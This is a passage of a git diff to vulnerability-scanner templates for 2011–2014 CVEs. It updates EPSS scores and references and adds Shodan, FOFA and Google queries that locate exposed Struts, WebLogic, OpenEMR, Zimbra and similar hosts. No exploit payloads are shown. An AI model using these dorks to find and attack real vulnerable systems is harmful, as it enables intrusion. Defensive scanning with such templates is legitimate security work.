cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -28,7 +28,6 @@ info: product: featurific-for-wordpress google-query: inurl:"/wp-content/plugins/featurific-for-wordpress" tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project - flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index 5c7c2d6751..7e1ccbaa8c 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -19,13 +19,16 @@ info: cvss-score: 6.8 cve-id: CVE-2012-0392 cwe-id: NVD-CWE-noinfo - epss-score: 0.9496 - epss-percentile: 0.99239 + epss-score: 0.96232 + epss-percentile: 0.99521 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve,cve2012,apache,rce,struts,java,edb http: diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 77f250d6b7..871de16bef 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -30,6 +30,8 @@ info: vendor: apache product: struts shodan-query: html:"Struts Problem Report" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve,cve2012,ognl,injection,edb,apache,struts variables: first: "{{rand_int(1000, 9999)}}" diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index 32cf37a74b..b65085a63e 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2012-0896 cwe-id: CWE-22 - epss-score: 0.02262 - epss-percentile: 0.88456 + epss-score: 0.01844 + epss-percentile: 0.883 cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index e118e248b0..89b6adbacb 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -14,13 +14,14 @@ info: - http://packetstormsecurity.org/files/view/108470/wpystap-xss.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/72271 - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-0901 cwe-id: CWE-79 - epss-score: 0.00216 - epss-percentile: 0.59612 + epss-score: 0.00223 + epss-percentile: 0.60514 cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -28,7 +29,6 @@ info: product: yousaytoo google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin" tags: cve,cve2012,wp-plugin,packetstorm,wordpress,xss,attenzione - flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index b2f43506a8..5dc025d5ce 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2012-0981 - http://www.exploit-db.com/exploits/18435 - https://exchange.xforce.ibmcloud.com/vulnerabilities/72824 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2012-0981 cwe-id: CWE-22 - epss-score: 0.02053 - epss-percentile: 0.8779 + epss-score: 0.01277 + epss-percentile: 0.85703 cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index 4742dede6e..102f0e9039 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -20,13 +20,16 @@ info: cvss-score: 3.5 cve-id: CVE-2012-0991 cwe-id: CWE-22 - epss-score: 0.81788 - epss-percentile: 0.98116 + epss-score: 0.72743 + epss-percentile: 0.98084 cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: openemr product: openemr + fofa-query: icon_hash=1971268439 + shodan-query: http.html:"openemr" + google-query: intitle:"openemr" tags: cve,cve2012,lfi,openemr,traversal,edb http: diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index 3b63c970e3..b2cd77da3a 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2012-0996 cwe-id: CWE-22 - epss-score: 0.02194 - epss-percentile: 0.89179 + epss-score: 0.03648 + epss-percentile: 0.91695 cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index b50c53d3e2..8b7ad35ea2 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -19,13 +19,15 @@ info: cvss-score: 7.5 cve-id: CVE-2012-1226 cwe-id: CWE-22 - epss-score: 0.10469 - epss-percentile: 0.94495 + epss-score: 0.09636 + epss-percentile: 0.94766 cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:* metadata: max-request: 1 vendor: dolibarr product: dolibarr_erp\/crm + shodan-query: http.favicon.hash:440258421 + fofa-query: icon_hash=440258421 tags: cve,cve2012,lfi,dolibarr,traversal,edb http: diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index 261a508fa6..9535d2cef9 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -21,15 +21,15 @@ info: cvss-score: 7.5 cve-id: CVE-2012-1823 cwe-id: CWE-20 - epss-score: 0.97491 - epss-percentile: 0.99972 + epss-score: 0.97363 + epss-percentile: 0.99899 cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: php product: php + shodan-query: cpe:"cpe:2.3:a:php:php" tags: cve,cve2012,kev,vulhub,rce,php - variables: string: "CVE-2012-1823" diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index 900ec78ab6..ec84cf8a73 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -18,8 +18,8 @@ info: cvss-score: 4.3 cve-id: CVE-2012-1835 cwe-id: CWE-79 - epss-score: 0.01124 - epss-percentile: 0.84313 + epss-score: 0.00919 + epss-percentile: 0.82867 cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:* metadata: max-request: 1 @@ -27,7 +27,6 @@ info: product: all-in-one_event_calendar google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar" tags: cve,cve2012,wordpress,xss,wp-plugin,timely - flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index a8e71b45e0..740b647a0f 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -20,15 +20,14 @@ info: cvss-score: 4.3 cve-id: CVE-2012-2371 cwe-id: CWE-79 - epss-score: 0.01345 - epss-percentile: 0.85828 + epss-score: 0.01099 + epss-percentile: 0.84417 cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mnt-tech product: wp-facethumb tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech - flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index c3d18b28f9..88efcb3730 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -24,12 +24,15 @@ info: cve-id: CVE-2012-3153 cwe-id: NVD-CWE-noinfo epss-score: 0.95986 - epss-percentile: 0.99354 + epss-percentile: 0.99471 cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: oracle product: fusion_middleware + shodan-query: http.title:"weblogic" + fofa-query: title="weblogic" + google-query: intitle:"weblogic" tags: cve,cve2012,oracle,rce,edb http: diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index 746bfbe330..f7f1623cb0 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -12,20 +12,21 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-4242 - http://www.reactionpenetrationtesting.co.uk/mf-gig-calendar-xss.html + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-4242 cwe-id: CWE-79 epss-score: 0.00216 - epss-percentile: 0.59546 + epss-percentile: 0.59564 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mf_gig_calendar_project product: mf_gig_calendar tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project - flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index 3036b6aa54..19515405fd 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-4273 cwe-id: CWE-79 epss-score: 0.00252 - epss-percentile: 0.64486 + epss-percentile: 0.65097 cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: 2-click-social-media-buttons google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons" tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer - flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 978a44a399..5cf6c3ca28 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -25,6 +25,7 @@ info: max-request: 2 vendor: laurent_destailleur product: awstats + shodan-query: cpe:"cpe:2.3:a:laurent_destailleur:awstats" tags: cve2012,cve,xss,awstats,edb,laurent_destailleur http: diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 69ab252b50..0338057e99 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -28,8 +28,9 @@ info: vendor: mikejolley product: download_monitor framework: wordpress + shodan-query: http.html:"/wp-content/plugins/download-monitor/" + fofa-query: body="/wp-content/plugins/download-monitor/" tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley - flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index 8182a35a3e..1fd009f975 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2012-4878 cwe-id: CWE-22 - epss-score: 0.00608 - epss-percentile: 0.7813 + epss-score: 0.00537 + epss-percentile: 0.7717 cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index be960aed11..f890c57174 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-4889 cwe-id: CWE-79 epss-score: 0.03526 - epss-percentile: 0.91352 + epss-percentile: 0.91568 cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index f427fcec55..095685c3f8 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2012-4982 cwe-id: CWE-20 epss-score: 0.00357 - epss-percentile: 0.71561 + epss-percentile: 0.72078 cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index c9a6ae8f37..6b48c50ead 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -20,14 +20,15 @@ info: cvss-score: 5.8 cve-id: CVE-2012-5321 cwe-id: CWE-20 - epss-score: 0.01926 - epss-percentile: 0.87386 + epss-score: 0.01708 + epss-percentile: 0.87767 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tiki product: tikiwiki_cms\/groupware shodan-query: http.html:"tiki wiki" + fofa-query: body="tiki wiki" tags: cve,cve2012,redirect,tikiwiki,groupware,tiki http: diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index ba0b6775f3..4fa2b42211 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -21,14 +21,13 @@ info: cve-id: CVE-2012-5913 cwe-id: CWE-79 epss-score: 0.01863 - epss-percentile: 0.88104 + epss-percentile: 0.8837 cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wordpress_integrator_project product: wordpress_integrator tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project - flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index 7eade9c1f7..013dd3ec0a 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.8 cve-id: CVE-2012-6499 cwe-id: CWE-20 - epss-score: 0.01204 - epss-percentile: 0.83755 + epss-score: 0.03575 + epss-percentile: 0.91621 cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 792c18b646..100e36e4a3 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve2013,cve,apache,rce,struts,ognl http: diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index b377638929..00c3842261 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -19,13 +19,16 @@ info: cvss-score: 5.8 cve-id: CVE-2013-2248 cwe-id: CWE-20 - epss-score: 0.97268 - epss-percentile: 0.99838 + epss-score: 0.97189 + epss-percentile: 0.99819 cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve2013,cve,apache,redirect,struts,edb http: diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index 33f46ae811..64ccc8c25b 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -26,6 +26,9 @@ info: max-request: 9 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve2013,cve,rce,struts,apache,ognl,kev http: diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 462bf63912..37be99a04c 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -20,15 +20,14 @@ info: cve-id: CVE-2013-2287 cwe-id: CWE-79 epss-score: 0.00219 - epss-percentile: 0.59251 + epss-percentile: 0.59874 cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:* metadata: max-request: 1 vendor: roberta_bramski product: uploader google-query: inurl:"/wp-content/plugins/uploader" - tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski - + tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski,intrusive flow: http(1) && http(2) http: diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 47c48e1895..731a8c9f84 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -14,13 +14,14 @@ info: - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html - https://exchange.xforce.ibmcloud.com/vulnerabilities/83311 - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2013-3526 cwe-id: CWE-79 epss-score: 0.00519 - epss-percentile: 0.74326 + epss-percentile: 0.76703 cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -28,7 +29,6 @@ info: product: trafficanalyzer google-query: inurl:"/wp-content/plugins/trafficanalyzer" tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer - flow: http(1) && http(2) http: diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index 1e74819b55..03118bbcc8 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -25,6 +25,9 @@ info: max-request: 10 vendor: oracle product: fusion_middleware + shodan-query: http.title:"weblogic" + fofa-query: title="weblogic" + google-query: intitle:"weblogic" tags: cve,cve2013,edb,lfi,javafaces,oracle http: diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 1c8d954e50..3e63fa5c58 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2013-4117 cwe-id: CWE-79 epss-score: 0.01217 - epss-percentile: 0.83801 + epss-percentile: 0.85273 cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: category-grid-view-gallery google-query: inurl:"/wp-content/plugins/category-grid-view-gallery" tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma - flow: http(1) && http(2) http: diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 7b2545baa8..ac3f74f129 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2013-4625 cwe-id: CWE-79 epss-score: 0.01217 - epss-percentile: 0.85008 + epss-percentile: 0.85273 cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -28,7 +28,6 @@ info: product: duplicator google-query: inurl:"/wp-content/plugins/duplicator" tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle - flow: http(1) && http(2) http: diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 3d944f4bee..b3f0897619 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2013-5979 cwe-id: CWE-22 - epss-score: 0.04915 - epss-percentile: 0.92611 + epss-score: 0.07984 + epss-percentile: 0.94272 cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index 255fd4324b..f232cefc9d 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -21,8 +21,8 @@ info: cvss-score: 4.3 cve-id: CVE-2013-6281 cwe-id: CWE-79 - epss-score: 0.00327 - epss-percentile: 0.70301 + epss-score: 0.0028 + epss-percentile: 0.68344 cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index 44c34d428f..dcc74225d0 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: synacor product: zimbra_collaboration_suite + shodan-query: http.title:"zimbra collaboration suite" + fofa-query: title="zimbra web client sign in" + google-query: intitle:"zimbra collaboration suite" tags: cve2013,cve,packetstorm,zimbra,lfi,edb,synacor http: diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index d0998b099d..a638342e79 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2013-7240 cwe-id: CWE-22 - epss-score: 0.21533 - epss-percentile: 0.96023 + epss-score: 0.26523 + epss-percentile: 0.96738 cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index ac36dc0e9f..ada7d4c3c8 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-1203 cwe-id: CWE-77 epss-score: 0.02045 - epss-percentile: 0.88732 + epss-percentile: 0.88951 cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index 68d8ce7de3..157d09e484 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -21,13 +21,14 @@ info: cvss-score: 10 cve-id: CVE-2014-2321 cwe-id: CWE-264 - epss-score: 0.96364 - epss-percentile: 0.99452 + epss-score: 0.95464 + epss-percentile: 0.99375 cpe: cpe:2.3:h:zte:f460:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zte product: f460 + shodan-query: cpe:"cpe:2.3:h:zte:f460" tags: cve2014,cve,iot,zte http: diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index 6b84e07eae..cea3f4dc40 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2014-2323 cwe-id: CWE-89 epss-score: 0.96033 - epss-percentile: 0.99445 + epss-percentile: 0.99481 cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: lighttpd product: lighttpd + shodan-query: cpe:"cpe:2.3:a:lighttpd:lighttpd" tags: cve2014,cve,lighttpd,injection,seclists,sqli http: diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index bd7dd109a6..282e65681c 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.8 cve-id: CVE-2014-2383 cwe-id: CWE-200 - epss-score: 0.00511 - epss-percentile: 0.76134 + epss-score: 0.00363 + epss-percentile: 0.72296 cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index 3ac2dfa0fe..aeb09fa129 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -19,8 +19,8 @@ info: cvss-score: 4.3 cve-id: CVE-2014-2908 cwe-id: CWE-79 - epss-score: 0.00594 - epss-percentile: 0.76056 + epss-score: 0.0045 + epss-percentile: 0.75068 cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 1b31232ed7..559529be23 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.8 cve-id: CVE-2014-2962 cwe-id: CWE-22 - epss-score: 0.95825 - epss-percentile: 0.99395 + epss-score: 0.95717 + epss-percentile: 0.99419 cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index c28ab34ad6..c1b42f6c26 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -22,12 +22,13 @@ info: cve-id: CVE-2014-3120 cwe-id: CWE-284 epss-score: 0.53209 - epss-percentile: 0.97551 + epss-percentile: 0.97602 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: elasticsearch product: elasticsearch + fofa-query: index_not_found_exception tags: cve2014,cve,rce,elasticsearch,kev,vulhub,elastic http: diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index 3bf155e20d..1c6524f68c 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2014-3744 cwe-id: CWE-22 epss-score: 0.00672 - epss-percentile: 0.77635 + epss-percentile: 0.79778 cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: nodejs product: node.js + shodan-query: cpe:"cpe:2.3:a:nodejs:node.js" tags: cve2014,cve,lfi,nodejs,st http: diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 1f6974f7c3..181d9dbb26 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -20,14 +20,16 @@ info: cvss-score: 5 cve-id: CVE-2014-4210 cwe-id: NVD-CWE-noinfo - epss-score: 0.96955 - epss-percentile: 0.9967 + epss-score: 0.96657 + epss-percentile: 0.99634 cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle product: fusion_middleware shodan-query: title:"Weblogic" + fofa-query: title="weblogic" + google-query: intitle:"weblogic" tags: cve2014,cve,seclists,weblogic,oracle,ssrf,oast,xss http: diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 8c002e1bc1..5beabf687e 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 - http://wordpress.org/plugins/infusionsoft/changelog - http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2014-4536 cwe-id: CWE-79 epss-score: 0.00149 - epss-percentile: 0.50857 + epss-percentile: 0.50948 cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +30,6 @@ info: framework: wordpress google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/" tags: 